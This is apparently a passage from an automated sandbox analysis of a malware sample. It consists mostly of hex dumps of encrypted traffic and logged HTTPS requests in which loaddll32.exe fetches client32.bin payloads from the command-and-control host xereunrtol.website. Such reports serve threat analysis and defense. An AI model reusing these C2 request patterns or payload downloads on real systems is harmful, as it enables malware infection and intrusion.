e2 ef b0 6d 37 ba 03 c2 9d 6c 93 9e ff 0f 1e 13 95 b5 df 60 57 7f 5a 1b 3b 6c 4a
                                                          Data Ascii: ?#*O?tvO$nw](hXpw1_ (&T]+q'lDeh=ds4pwW](-MJ=)ljyX;%B.%PA"A5M;%58b5?bs8cq#3pUNab#Y29m7l`WZ;lJ
                                                          2021-10-08 04:46:08 UTC255INData Raw: f8 dc a9 6b e0 45 2c b9 2b 1d e8 1a 0a f8 6b fd 20 7a cf 61 be 56 44 d9 f7 86 a0 70 3a 81 48 69 11 22 8e bc 28 e6 32 38 31 a9 46 c5 31 40 a9 50 af e6 c3 bb 68 cf d9 e9 6e 85 14 62 be 36 a8 67 4c 3a 0e b5 7a c1 59 89 05 fd d8 06 b7 58 97 bf b6 3e ae 4b 25 3c 0f 10 62 9c b7 ba 48 1d b8 1b fe 85 59 ac 67 62 7b a9 88 50 d8 c7 10 45 1e fe ab e6 c3 8d c4 cb a4 9b 4d 44 de 93 e5 5f dc 35 8c 0a 31 4a b0 03 42 fb f2 70 f0 9b 56 b4 4c 24 2e b8 99 2e 52 9e 54 23 9f f2 60 6f 60 55 9a 17 20 c8 a6 06 78 9f b5 2a ec a9 91 c0 0f 13 bf 52 b0 d9 7c 22 3c 89 43 c3 59 3b 86 98 77 b1 c7 12 1a 26 74 7b f7 bd 43 36 9c c2 c6 a3 bf 17 c4 bc a7 ca ec 5e 82 03 7b 05 d1 56 bc 81 76 73 6a da 8e 5d e7 88 65 ee fb d3 73 39 f9 03 d6 6d 4c ee 3f 58 c9 24 15 d7 1b 51 a6 46 63 81 da 09 6d
                                                          Data Ascii: kE,+k zaVDp:Hi"(281F1@Phnb6gL:zYX>K%<bHYgb{PEMD_51JBpVL$..RT#`o`U x*R|"<CY;w&t{C6^{Vvsj]es9mL?X$QFcm
                                                          2021-10-08 04:46:08 UTC271INData Raw: 15 6d 85 f6 1f 2b 13 1e 37 a1 63 b7 d4 0b b6 0e 01 7c 5c b5 17 fc 78 46 30 50 25 d7 49 1c 6f 5d 40 d6 a3 0e 8d dc 99 a0 41 c1 7b 3e 2b 8d 60 3f 03 8c bc 71 3a 39 f1 3e c5 d3 c8 23 fe 60 eb b3 8f 97 b9 45 b1 86 2a 62 e9 55 8f ba fe 57 cc a4 44 eb 15 e4 c8 bf 58 30 07 7f 21 a9 a7 ad 8f 84 70 5a b0 4f 90 2f 9f 8a 0d 17 ca 7d 2d 31 fd 6e ab ae ee 2c cf f2 7b 79 96 eb 3b 40 eb 3a fa ed b0 3d 8b ca d3 7d 2b d9 2a 1e f7 78 01 f2 76 e6 8c 8b 37 01 4f 2d 50 da 8b d7 75 35 61 04 e2 49 40 8a 20 e7 5d ca 46 25 0a 05 eb 16 26 ad a4 b3 f2 35 ca 19 0e dc ef ef dd 89 6a e0 04 16 db fe 88 6d 28 b6 6a 71 1e 2d 19 f5 94 b2 e5 35 20 bc 9f 67 d3 f6 8f d3 88 6c 7b 16 30 fe 8c d5 ba e8 60 27 f1 00 8f a8 ae 60 87 d7 c4 8a 60 9a a2 63 3e e5 ed ed ba 29 4a ff cf d0 08 5a 31 83 f2
                                                          Data Ascii: m+7c|\xF0P%Io]@A{>+`?q:9>#`E*bUWDX0!pZO/}-1n,{y;@:=}+*xv7O-Pu5aI@ ]F%&5jm(jq-5 gl{0`'``c>)JZ1
                                                          2021-10-08 04:46:08 UTC287INData Raw: f9 fe 8b 20 93 c9 89 1c eb 77 99 9b 97 97 cb d1 93 27 94 88 73 5f 88 e6 e3 62 22 ae 57 3c fc dc 42 b3 e0 b8 78 58 61 b5 42 45 e8 04 4a 1c 0c 22 bf 3b f9 d7 74 f9 48 11 f1 d4 99 0c e6 6f 36 fc 9d 6f 89 c8 73 4d 1a f5 e6 12 ec ea 72 6a 9d 4b 12 5a 0a 80 2b 87 e7 eb 2e d9 e1 af 0c dd 84 82 02 dc 1f 75 19 bc 4d 22 10 94 26 c9 62 9c 48 20 1d 05 41 a1 b6 34 4a e2 7e 95 ff 0e dd f2 18 5b df be 06 ca 05 a3 f0 40 6b 26 9c 63 89 1f 47 04 d0 7e c8 d0 07 db 5f 5d 97 f3 47 69 68 7e bb 3f ee d9 7d 6e d7 c1 6d 05 aa a6 3c df 3a 4f a4 29 2d 47 76 85 b9 30 fc c1 f8 e8 17 df c8 50 75 6f f1 fa a8 9f 12 15 89 16 d8 fc ca a5 5b 5e e4 38 4b 79 d5 ab 4f e9 60 38 11 9c 1e 4a 12 3f 1e ee c9 71 fe ce 0b 41 30 18 d7 de e1 18 82 d0 b7 22 28 bf 3b 15 35 ff 69 27 bd af 89 7e c0 d3 c8
                                                          Data Ascii: w's_b"W<BxXaBEJ";tHo6osMrjKZ+.uM"&bH A4J~[@k&cG~_]Gih~?}nm<:O)-Gv0Puo[^8KyO`8J?qA0"(;5i'~
                                                          2021-10-08 04:46:08 UTC303INData Raw: fa 6a dd d9 b6 56 01 b9 23 cf a6 6f 98 07 28 44 36 9b 21 ce 07 4e 80 38 df 93 d2 56 94 ad 07 7e 85 97 18 0f 30 f1 5c e1 b6 a6 f0 cb fd 03 9b c1 36 d9 b4 65 9b 32 2c a6 17 54 76 7f 9e f4 27 0d dc 41 94 17 23 10 3f 10 54 cf 98 e8 6c 9a e9 a9 29 b7 0d 1d c7 a3 11 ed f4 3e 12 99 4f cc 0e d5 0c 8b 4e 2c 36 c3 7d bc 21 49 22 02 55 98 bd 17 7d 8d 67 95 39 23 06 92 cd b4 3a f0 a6 c6 b9 bf 98 36 d6 ed 3a 16 7e 27 2b 07 f9 7e 69 d6 36 48 ac ca 04 f5 3c 44 1b 3f 10 b7 cf 3f 23 46 fb 25 43 0f 3e 56 1a 0b cc e7 ee 2a 7d 62 40 b0 c1 59 e7 b8 47 61 34 1b a0 f2 9f d4 95 9e 3a 40 bd 70 f4 e9 bb b8 30 0c 0f b4 0d 88 91 82 53 a6 82 5a b0 2f b5 e0 95 6a 54 4f c2 4c c7 76 c6 89 2b b2 31 10 be b5 2e 53 d2 2b d5 67 54 6c 3b 8a e2 b9 6a 76 52 ba fb 0d 93 07 c3 1e a3 f8 f1 a7 82
                                                          Data Ascii: jV#o(D6!N8V~0\6e2,Tv'A#?Tl)>ON,6}!I"U}g9#:6:~'+~i6H<D??#F%C>V*}b@YGa4:@p0SZ/jTOLv+1.S+gTl;jvR
                                                          2021-10-08 04:46:08 UTC319INData Raw: 26 a3 12 1c d0 94 0f 81 f7 71 a9 ea 18 4e b0 e6 5d 36 36 0c 97 af e9 cf 40 a5 ea 77 25 02 dc 2b 1c 0a a7 b0 17 77 bc 7f 36 21 89 ee 8f 95 1e cb 05 f4 12 c0 83 fa 6c 15 1a 35 0d 05 7e de 4d af f2 26 6f b9 a0 e0 1c 59 0d c2 55 48 96 83 f4 7c ae af 9c 79 6c 20 18 73 27 c0 4c 4f 4b 0f 2b 5a 8a ae 2d 46 65 0f 59 5f 37 08 d7 5e ad 1b a8 3e a8 a2 2d d2 48 3a 04 ed 1d 68 e7 05 2d 94 ec 3f 3c 85 69 0c 5d 2c 83 5f e7 7f 15 c1 52 f1 5d 04 05 99 02 81 eb 6c 69 f4 f3 61 41 50 80 99 2d c6 ed 21 ff 69 f0 d6 45 80 ff 73 6b 5e 33 08 87 35 a9 bc 21 f0 19 3b a3 0a 5d 70 d8 ca 9c 76 7e 4a 7d 6c c4 44 6f 76 f0 5b 2f 39 3b 65 7b 6f 85 f0 03 b1 0f 82 3c 7e 37 2d 77 35 76 09 33 96 ad 4e 78 81 8c 04 74 5c 6f 38 39 38 57 42 af c8 d1 70 a0 08 3e 8f b4 db 54 02 ce 93 83 61 69 4f 36
                                                          Data Ascii: &qN]66@w%+w6!l5~M&oYUH|yl s'LOK+Z-FeY_7^>-H:h-?<i],_R]liaAP-!iEsk^35!;]pv~J}lDov[/9;e{o<~7-w5v3Nxt\o898WBp>TaiO6
                                                          2021-10-08 04:46:08 UTC335INData Raw: 80 63 af 8b 3e e7 f8 71 63 9f c0 ae d0 db b4 e4 c6 7e 2c 46 b0 95 27 fa cf 74 df cd e0 96 76 c3 f4 2f 7d 88 a4 7b d0 0f a0 d7 c2 aa 78 e9 7b 5e d1 7a 31 81 ee 54 0b 70 84 b2 97 88 3f bf c2 d3 85 87 be 80 1b 7f 7f fb 43 7c 47 8a a1 db 24 a0 b3 91 11 be 97 b3 ab ad 4e 82 c4 a2 f0 0a f0 ec 8e e5 13 3d 26 93 6f 83 ee 3f 09 81 89 fd 8a 3c 4a e7 ba 96 23 42 47 87 0d ae 32 52 c8 bf e1 78 5c 49 9e aa 06 db 00 fb a5 d0 4d 24 30 77 59 54 d0 c2 e0 99 fc 46 f2 b3 3f 77 e4 35 7d ac c6 86 a0 c2 b2 a4 45 fb 00 19 05 42 97 13 f7 97 79 fb 4a 26 e9 b1 2c e9 7c 2d a7 f7 21 3c 02 68 35 9d 71 f3 71 53 ed 92 a4 d9 ac 43 1f 78 5e 06 40 45 a8 99 ac 57 8c 17 e3 60 15 38 c0 9f 35 b8 52 b5 ff 6b 7d 3b 8b 05 de dd aa 9f 9e 59 f9 3b 97 53 b9 35 8d 22 7f f9 c7 8e 0a f4 46 92 ea 96 0e
                                                          Data Ascii: c>qc~,F'tv/}{x{^z1Tp?C|G$N=&o?<J#BG2Rx\IM$0wYTF?w5}EByJ&,|-!<h5qqSCx^@EW`85Rk};Y;S5"F
                                                          2021-10-08 04:46:08 UTC351INData Raw: 52 7b f3 5d 4f f6 75 4d 3e 86 80 c2 35 e0 20 3b d6 57 75 ee 6c 3b b6 e2 3c 9e c8 67 a7 4d dd 9b 04 91 02 20 f2 13 00 1f e4 e4 0d 34 25 79 ea c5 9d 06 d1 25 af 29 d7 86 22 bb 6e a7 ec 49 a5 a9 d8 92 40 28 67 c9 16 df c3 f2 49 14 f7 d1 66 20 86 80 c0 00 8d 08 38 4e 71 53 27 9b ab 5b ca 15 59 43 aa 49 39 b8 58 0b f7 59 42 a9 40 8a a4 a5 89 ce e4 72 48 76 e4 55 51 46 e9 e1 50 74 90 ab ac 34 c8 df 72 6e 7a 07 8f 13 ed 20 e8 99 33 14 9f 4c 03 c5 f1 18 9d 65 af fc d6 76 ec af 95 e0 0d 84 f4 12 3f e4 12 93 fc 5c 74 65 ae 23 96 15 b5 e0 07 5a 53 94 f3 50 13 b0 1d 2b 44 b1 a7 d9 42 da b5 9a 83 71 13 7a 3b e9 3c fd 6b 2e cd 76 ea 8f b7 35 ff 6e 82 30 1a 66 90 bf 8d 0a 0a 67 de 7a ea d2 e4 86 15 0a 97 4e b3 03 ff fa b5 39 31 e4 fa ed 78 89 63 42 41 14 29 8d 37 6e 25
                                                          Data Ascii: R{]OuM>5 ;Wul;<gM 4%y%)"nI@(gIf 8NqS'[YCI9XYB@rHvUQFPt4rnz 3Lev?\te#ZSP+DBqz;<k.v5n0fgzN91xcBA)7n%
                                                          2021-10-08 04:46:08 UTC367INData Raw: 77 44 f0 ae 7b cf 0a 1c 3a bf a3 0b 39 8a 6c d5 11 87 c0 d9 b3 06 c0 f5 b2 9b a0 06 2f b4 50 b1 4a b5 e4 4c cf d2 f0 e3 f5 e4 e5 15 1f 20 23 f3 95 65 c6 6e 5c 9e c7 d4 e6 3d 26 7d 5e 62 5d d1 02 b6 25 78 c2 33 fe c5 b9 d0 2f b5 b3 b7 0b c6 f9 c7 d2 0b bb 4a d9 0d 2a 1a 67 76 ff 58 b9 2c 08 5e 41 7a a3 52 40 d5 84 c4 50 90 07 c2 3a ff 26 8c 27 26 8b d6 87 6f 72 29 ea 31 7e ee ea a8 a4 47 43 bd 2e d3 26 1b 47 cc ee 6d c3 62 ad bc 91 3e 06 63 b3 4e a5 ad 5c 88 12 20 fc 04 71 16 b4 9a 34 10 90 ee 4f 8e f2 e6 19 f8 fa 58 3b 72 c9 be a1 40 2c 41 9b 10 53 dd e6 d3 83 04 72 38 7d 2f 5d 6c 28 7a 23 3c cd a7 37 ee d8 0f a9 9f 9e 85 9b 84 f7 92 f6 ab f2 2d 0e d6 bf d4 2a 30 80 37 a9 f7 e3 61 21 00 54 26 73 4c 62 d2 f0 5c b3 28 24 f1 0d 94 28 4e c8 ae 45 a1 b5 eb ce
                                                          Data Ascii: wD{:9l/PJL #en\=&}^b]%x3/J*gvX,^AzR@P:&'&or)1~GC.&Gmb>cN\ q4OX;r@,ASr8}/]l(z#<7-*07a!T&sLb\($(NE
                                                          2021-10-08 04:46:08 UTC383INData Raw: 78 1c 14 65 77 7a 51 bb 67 a4 69 d1 5e a8 26 d5 26 2d 3d 22 67 c2 aa 60 8c bb ce ba c4 03 c9 9a 43 1c 80 3d fc 8f 29 e3 a8 db 17 60 45 1b 47 ad a2 0c e5 de 30 a1 bd 2c 0f b5 bb de b2 de 87 67 bf 0e d7 7f e5 d1 5e 0b de cc 61 97 03 25 d4 8b b7 78 3c 6d 7d 35 11 19 25 27 ea 2b 72 3b e3 55 db 30 c0 be d8 b7 aa 75 e5 03 5e d8 2b ab c6 ce 88 87 88 a7 01 2a c3 ee ab 4b 6d 96 db a0 0f fd a9 8b e1 be 11 c4 83 bb c5 1d c3 f8 f7 6e 31 fb 31 f4 3d a2 a2 fd f3 27 61 d4 e7 c1 7e d4 e4 bb 96 8e 30 c4 8b 31 ba 79 28 d2 91 ce 71 44 1f 98 d5 3c 71 7b e6 fa 73 83 0f 61 c0 8c 2b 03 1a 35 c0 73 f6 69 8e 4f 26 19 bb a2 2f f5 88 2f eb 8e db 61 9b d7 58 ed 0f aa 23 f3 3d c4 e7 a9 1a 93 42 20 fd dc e4 51 c2 33 e5 ce 56 b0 17 69 47 59 82 8e 0f a0 44 b5 d0 f5 d0 a0 f0 0d 9d 80 8b
                                                          Data Ascii: xewzQgi^&&-="g`C=)`EG0,g^a%x<m}5%'+r;U0u^+*Kmn11='a~01y(qD<q{sa+5siO&//aX#=B Q3ViGYD
                                                          2021-10-08 04:46:08 UTC399INData Raw: 94 1c 23 ae 12 4f e1 d4 6f 6a fb 51 50 c0 db d8 33 40 34 c9 48 82 86 b7 da a7 02 11 1e b5 7e 3f b0 21 de 2a cf 9e c1 43 65 e4 3d 95 57 0d eb 1c 71 81 3d f2 2f a6 92 df 75 f6 87 0c 63 d9 ea 47 47 74 59 fe 36 de 18 1b 91 bf 83 50 06 e3 39 5e ab fd 41 db 37 b7 3f f4 45 15 66 e7 40 89 76 4e fb e3 cd 3b 3d d2 39 4a 38 47 6b 28 83 56 d6 96 fd 52 3d b3 2c d0 da 9a 84 c7 c6 c2 51 37 a4 1e 82 39 65 ee df f8 73 eb ab 2d 1d d0 6c a9 f6 bc ff aa 51 64 d5 80 f6 67 17 e5 53 74 2d ef c2 78 17 80 62 ea 95 14 b7 0b be 56 af c6 8f 1b e7 5c 67 31 ff 1e fc a3 c7 80 74 f1 a4 6b 8a 42 b6 97 f4 a3 c0 71 35 d1 b9 6c 77 e2 c9 ba c5 1d 5a ff 88 c9 51 a0 cd ed 0d a3 97 1c 6e ee 9c cf f4 cc 6d ab cf 58 84 39 1e cf c1 b5 ab c6 c4 d0 d4 51 3c 4c 61 1f 5e db 23 fa b7 9f ff 8e a9 6e dc
                                                          Data Ascii: #OojQP3@4H~?!*Ce=Wq=/ucGGtY6P9^A7?Ef@vN;=9J8Gk(VR=,Q79es-lQdgSt-xbV\g1tkBq5lwZQnmX9Q<La^#n
                                                          2021-10-08 04:46:08 UTC415INData Raw: 35 83 72 5a 1a 5f 59 cf 37 9d 17 b8 68 82 33 54 77 b4 59 66 21 a0 38 8a 4d c1 1a de 67 60 14 e1 8f 1c 5f c8 2d 0e 55 2a 7c 48 8b 52 d3 d6 d6 da 25 22 1c 4c b9 dc 41 3b ed 38 bb 85 07 88 57 a6 73 93 16 a7 f9 6c b0 ed be 4d 74 24 30 4b 7b 65 9f 4d 7b c6 90 e7 2c b8 5c b4 b0 02 b8 da 32 86 09 2e 71 4c d0 70 7e ca 86 71 48 cf 46 ab 44 78 ac 70 dc df 7c 9d 26 cb 7b 76 80 fa 48 72 b0 33 c8 b8 00 1d c3 6b 90 2b be d4 fb 0c f2 18 a2 f0 5b 1d 2c 54 be 04 7e cc 9a 84 6c c4 e7 79 90 94 f7 8f f2 32 75 d4 eb 74 31 44 a3 07 9c c3 53 56 9e d6 04 19 d9 84 29 8d 4b b4 a3 38 84 92 78 a6 b8 b2 9f 93 e0 23 0b 77 46 9f d9 58 eb f7 4b 93 1d 19 86 86 c9 de 67 df 17 20 c3 5d 79 78 01 ab 54 6e 75 72 bb 1f c3 d4 53 7c 36 22 1b 5f 01 06 22 9f fc a9 68 d3 a4 de 8f 74 81 61 be 1a a3
                                                          Data Ascii: 5rZ_Y7h3TwYf!8Mg`_-U*|HR%"LA;8WslMt$0K{eM{,\2.qLp~qHFDxp|&{vHr3k+[,T~ly2ut1DSV)K8x#wFXKg ]yxTnurS|6"_"hta
                                                          2021-10-08 04:46:08 UTC431INData Raw: da 31 5d 33 e5 bf 73 f4 38 ac 10 81 6f 60 e1 0c ab bc 9d 3d 68 24 3f 67 5b ec d0 6c 2b 32 6f 2e ce c6 95 87 26 a1 6c 1a 3e 17 55 a4 dd fb 7f 6f a3 52 0c b9 b1 7b 5d 0d 14 1e 02 af c1 bb 54 f0 69 ea f6 63 f3 ee 9b 88 4f 2e f3 e0 b4 4a 33 ad 26 5a 54 fa be 94 fb 05 11 98 2b eb 84 c9 b4 db 00 df 06 0c 0c 05 f4 89 50 23 0f b4 60 6f 6c 9c 58 c3 e5 8b 55 bc 98 a9 2d 2d 4e 3b c9 ee 0a 80 7c cc 08 2c 6e 81 0b 1b 18 f3 46 3a aa a8 a6 cc f3 c0 d0 d8 b5 1c 76 45 6e b8 99 2d 83 90 3f ba 41 ee a6 49 80 ea 8c 61 39 d6 c9 05 ac 82 22 c0 60 dc c6 31 09 1a ae 50 6a 73 c9 5f a8 65 fa d8 6d 5b c1 fa 23 22 91 45 8c 8f e5 89 63 19 76 2b 3b fd 53 2d 30 8d 85 2f d8 18 c0 9e 79 bf be ad 7d 54 cb db 1a f9 eb bb dd 5d f4 20 f3 af 00 6b 49 df 72 d4 4b fb b8 ac 5f 0d 4e 9f 88 28 8c
                                                          Data Ascii: 1]3s8o`=h$?g[l+2o.&l>UoR{]TicO.J3&ZT+P#`olXU--N;|,nF:vEn-?AIa9"`1Pjs_em[#"Ecv+;S-0/y}T] kIrK_N(
                                                          2021-10-08 04:46:08 UTC447INData Raw: 3d b8 21 3f 93 df b6 80 9a db d5 c2 81 24 aa ed 4e db 8e 10 1c 9e fa 48 8b bc 52 76 3c d6 72 e4 34 07 16 d8 44 77 f8 61 9f f4 3c 18 f3 cb 85 9f 28 33 a1 3d 0b 33 f9 d9 be c3 94 5e 39 94 9f 49 78 c8 c6 10 ff 1d d9 bb 26 1e 9a f1 a5 ee b1 cd d0 ee c3 40 82 a8 73 8e d7 a0 e4 54 60 7c ff 97 73 ba b9 cf 08 5e a0 6d c3 fc af 8f 57 4d 62 fd 29 1a 4d 3a 57 0a bd 6b f6 2e 4b 96 9d f4 35 78 97 56 5f e5 63 f9 a6 74 1b 1a e6 45 54 94 c7 b0 1a 1e 86 1e 7b e5 92 cd e8 b7 c1 4b 0e 60 38 cd 38 52 0b 4e d7 db 0f b2 98 d5 7c f7 f8 a0 5b 7f ea a8 ac 8a 0e fa e3 a7 c2 e6 b2 f2 45 8d ad 8d 12 7d 4d f4 6d 7e 6a 03 1b 64 73 05 1b c1 37 16 f7 39 9d 37 19 11 20 b2 de d8 59 2e 77 28 b3 5f d4 2d 6b d1 ac a9 d9 a8 9f 2c fc f5 45 6d fc cc 9f 21 6b 00 ca c2 29 a5 7d 0e 8f 16 17 e4 42
                                                          Data Ascii: =!?$NHRv<r4Dwa<(3=3^9Ix&@sT`|s^mWMb)M:Wk.K5xV_ctET{K`88RN|[E}Mm~jds797 Y.w(_-k,Em!k)}B
                                                          2021-10-08 04:46:08 UTC463INData Raw: 5b 00 e4 59 22 96 1a 50 b6 d5 97 5f 9e a4 a9 32 4e 72 29 6c 38 7e e2 1f a4 e3 fc 1b a5 9b 44 c1 4f 46 00 f6 c9 44 53 66 a1 11 51 ca 3e 37 2e 5d d1 e8 5c e1 a3 9b 6a 06 e9 05 39 2e 45 5e 73 02 d3 64 1d 73 c2 5c 9b a6 c1 f4 72 f1 7a 95 45 f4 8a 38 37 f3 2d 0f d0 0e be 3a 8f 15 9e 88 51 e2 ff 3e 44 0c b2 42 08 69 7f cc 14 60 5a 2b b5 f8 c6 50 50 f0 45 c3 9b 24 ad 64 b1 a0 00 c4 68 a2 fd 29 35 b2 a0 83 c2 c4 62 19 2b ad d5 9a 45 c6 3a 4c cb 4a c1 44 4d 7e 56 7c 75 9f 7c dd 9e f2 7e 7e 50 9b d5 dc a4 77 19 2f bf 10 06 89 1f f7 4d c5 6a 6f 9e c2 e7 58 8c c6 d7 5b 6e 17 31 da 94 be af db 65 60 23 80 27 de c6 81 e9 79 df 7d a6 d5 77 40 0a 83 b0 34 17 2c 5b 24 d1 1f 59 e1 71 70 5d 93 c6 d5 65 f6 99 1d f7 a8 96 74 69 e7 f4 bf 6b 3b 25 12 ec 0f 62 30 0d f2 91 80 bf
                                                          Data Ascii: [Y"P_2Nr)l8~DOFDSfQ>7.]\j9.E^sds\rzE87-:Q>DBi`Z+PPE$dh)5b+E:LJDM~V|u|~~Pw/MjoX[n1e`#'y}w@4,[$Yqp]etik;%b0
                                                          2021-10-08 04:46:08 UTC479INData Raw: 38 db 75 9c 2b 7e ca 69 0d b6 59 a3 6e 2b 20 f4 ab 7d 3b f7 ec 22 2b d3 c9 14 4a 94 79 e6 db c4 de f7 ad 75 21 62 2b b3 31 43 5f 0f 8a d1 94 2f 26 bf c7 ec 69 ab 40 9b bf f7 f5 b1 61 21 f0 70 4a c3 d0 8f 8b ef 4d 6a fc 52 f6 a1 d4 a5 20 16 65 a9 c4 88 a8 4e 8f 35 3e a8 db c1 bc 63 16 29 1c 64 f8 d5 e8 93 bd e5 70 61 70 44 e9 24 ba 15 82 02 50 bc 7d e9 3e 17 ab e3 6a f5 1e 59 46 9e df 03 91 7b 3f 71 fb ae c5 c2 f1 f0 92 3e e3 e4 1d 4d bb 12 46 cb 08 ad af 87 00 cb e9 07 89 10 d9 26 35 78 9b bc e7 fa fe 86 c7 95 96 05 90 bc b3 57 ea 4a fa 4b 3d f9 f3 6c a6 42 d9 39 b4 45 dc c2 4c 31 0c 79 2e 49 ef c6 91 dc 17 a5 8a 4b 6c c4 8e 97 b1 75 c6 06 75 c7 a8 f0 6d 91 cb ab 48 6a 82 df 01 7c ad 79 01 fb 1e 68 6b 3a dd 8a 59 c6 99 11 44 e3 e4 77 be 64 a2 66 a3 73 ea
                                                          Data Ascii: 8u+~iYn+ };"+Jyu!b+1C_/&i@a!pJMjR eN5>c)dpapD$P}>jYF{?q>MF&5xWJK=lB9EL1y.IKluumHj|yhk:YDwdfs


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          8192.168.2.349830193.29.104.83443C:\Windows\System32\loaddll32.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2021-10-08 04:46:09 UTC493OUTGET /pojol/pfDJgBAB44HEkaaE/IAkYjQDoenC7dCc/knaeZ_2Bc4niJWZDoT/92La9yVP8/Nm_2F8vIouJQNUgCe_2B/Wv7KOG1Nz3mjOa0l_2F/OnBpy4GwhZX8qV0mLK2Wlc/FREIwqk_2Fjl_/2BOUAmEa/t8HTP1o0pL0qYjqL1hIxYFo/1EnpJwv2G5/SCJcrEDAQ0UY_2FXk/piB_2BjH/Biqze_2FNrj/O.jop HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                          Host: xereunrtol.website
                                                          2021-10-08 04:46:09 UTC493INHTTP/1.1 200 OK
                                                          Server: nginx/1.20.1
                                                          Date: Fri, 08 Oct 2021 04:46:09 GMT
                                                          Content-Type: application/zip
                                                          Content-Length: 1886
                                                          Connection: close
                                                          X-Powered-By: PHP/5.4.16
                                                          Set-Cookie: PHPSESSID=5r8o420cre2icnvtf8ofentj01; path=/; domain=.xereunrtol.website
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: public
                                                          Pragma: no-cache
                                                          Set-Cookie: lang=en; expires=Sun, 07-Nov-2021 04:46:09 GMT; path=/
                                                          Content-Transfer-Encoding: Binary
                                                          Content-Disposition: attachment; filename=client32.bin
                                                          2021-10-08 04:46:09 UTC494INData Raw: 50 68 7e 88 fd 83 00 a1 03 06 34 53 8d 9d bc a7 1d d1 0b ea f1 da 30 af b5 2d 84 00 67 79 76 2f f4 27 ae 4c 35 df 33 3c 5a 88 72 04 2d d5 b2 16 24 3e a8 05 65 a5 32 1f 9e 85 41 8d 9a e3 21 ac a6 ef ab ab 9c 9d 57 f1 65 9a 96 d9 ba 71 ad ff b1 34 fe 56 bc cd e1 98 05 c3 c7 e4 81 f8 20 ae 1b d7 1e c0 a9 f8 18 6f 60 f0 c1 04 f0 3d 5a 07 7a f0 62 29 1e 88 25 26 76 69 3b c1 ff 30 40 61 9b 18 72 57 87 6a fb 88 b5 42 26 25 25 f7 c2 2c 9c 73 33 d4 98 53 3e 7c 0b ab 04 ec 16 c8 e8 65 80 9c 54 9d b5 85 03 75 e1 01 34 7e 16 71 f3 68 4e 0d c9 18 fc 1c 1b 3b 27 08 be 55 df d6 38 f4 43 7f 19 9f 0e e8 d6 bb c0 a5 c9 9e f4 24 a6 6a c0 6f 0a b0 5c 59 ff 17 75 49 cb a2 10 d1 74 13 af 7d 2a 7b ac 3b cc a0 4d 9f 3c 07 c7 77 86 b5 41 50 4e 19 e7 ea 65 74 4a 93 5a 74 a7 bd e9
                                                          Data Ascii: Ph~4S0-gyv/'L53<Zr-$>e2A!Weq4V o`=Zzb)%&vi;0@arWjB&%%,s3S>|eTu4~qhN;'U8C$jo\YuIt}*{;M<wAPNetJZt


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          9192.168.2.349831193.29.104.83443C:\Windows\System32\loaddll32.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2021-10-08 04:46:14 UTC495OUTGET /pojol/W4QiDRChG_/2BVblDFptU_2BRt86/bDQ28Atm7UJp/hMrJ18dixaJ/Ehvso7jB6b1A7n/fuEtfFyRY6z_2FVw8s1t6/enfrMlaYNyygktry/YNTHSHxjijP0_2B/G7FZq6LMuf5Bf2R30l/ih28AE5GN/brwux6ZnrceibZm2b3Bl/W4v_2BEcLNfhDC9uqG8/mC3B1bUhAB/QJIQRA6ic/2.jop HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                          Host: xereunrtol.website
                                                          2021-10-08 04:46:14 UTC496INHTTP/1.1 200 OK
                                                          Server: nginx/1.20.1
                                                          Date: Fri, 08 Oct 2021 04:46:14 GMT
                                                          Content-Type: application/zip
                                                          Content-Length: 218248
                                                          Connection: close
                                                          X-Powered-By: PHP/5.4.16
                                                          Set-Cookie: PHPSESSID=bnb8bbjh246g8ah1kt3ji1eou1; path=/; domain=.xereunrtol.website
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: public
                                                          Pragma: no-cache
                                                          Set-Cookie: lang=en; expires=Sun, 07-Nov-2021 04:46:14 GMT; path=/
                                                          Content-Transfer-Encoding: Binary
                                                          Content-Disposition: attachment; filename=client32.bin
                                                          2021-10-08 04:46:14 UTC496INData Raw: 6c bd b1 55 78 3c 2f 83 96 64 28 5e 83 05 8a 9a 59 e6 8f 32 73 cc 25 de a8 df 45 46 5c 2d 0d b3 28 f4 8d 45 6b 12 58 97 d6 53 d0 b5 93 3f 2a 25 51 dc 23 ad 8b 05 f8 ab 94 02 fa c9 22 c7 8b 6e 75 10 d0 56 0b 1c b5 f9 0b a6 ec 6b c5 b4 0f 8c 2d 83 76 7b aa 47 60 e4 db 6d 87 2e 5f 50 3b e9 f5 82 a0 64 79 2f 8c c6 06 e8 e3 05 8f 00 27 8d f9 e7 63 00 f9 00 cd d7 22 84 c8 9e 1e 70 22 68 90 cd f2 a8 2a c3 66 b0 42 d8 df 29 ad cc 8b 27 d7 d2 75 b1 a2 d4 b6 de c2 f5 34 34 0e 8f e7 70 fb 01 16 88 11 90 33 ba 4b b0 87 5b ef 8e ce 71 3b fd 3e b4 43 79 ca 65 0f a6 03 cc 96 72 a8 96 ad ea 48 bc f5 23 36 9b d2 29 17 53 15 a2 b3 86 9f 7a 2b c0 b0 17 7b 86 5f 95 f6 d5 68 af de b9 ca df 3d 44 80 fc 23 4d c2 0a df 43 93 eb 3c 74 46 5a 69 3f 1a ff 44 2b fc f1 44 b6 c5 74 04
                                                          Data Ascii: lUx</d(^Y2s%EF\-(EkXS?*%Q#"nuVk-v{G`m._P;dy/'c"p"h*fB)'u44p3K[q;>CyerH#6)Sz+{_h=D#MC<tFZi?D+Dt
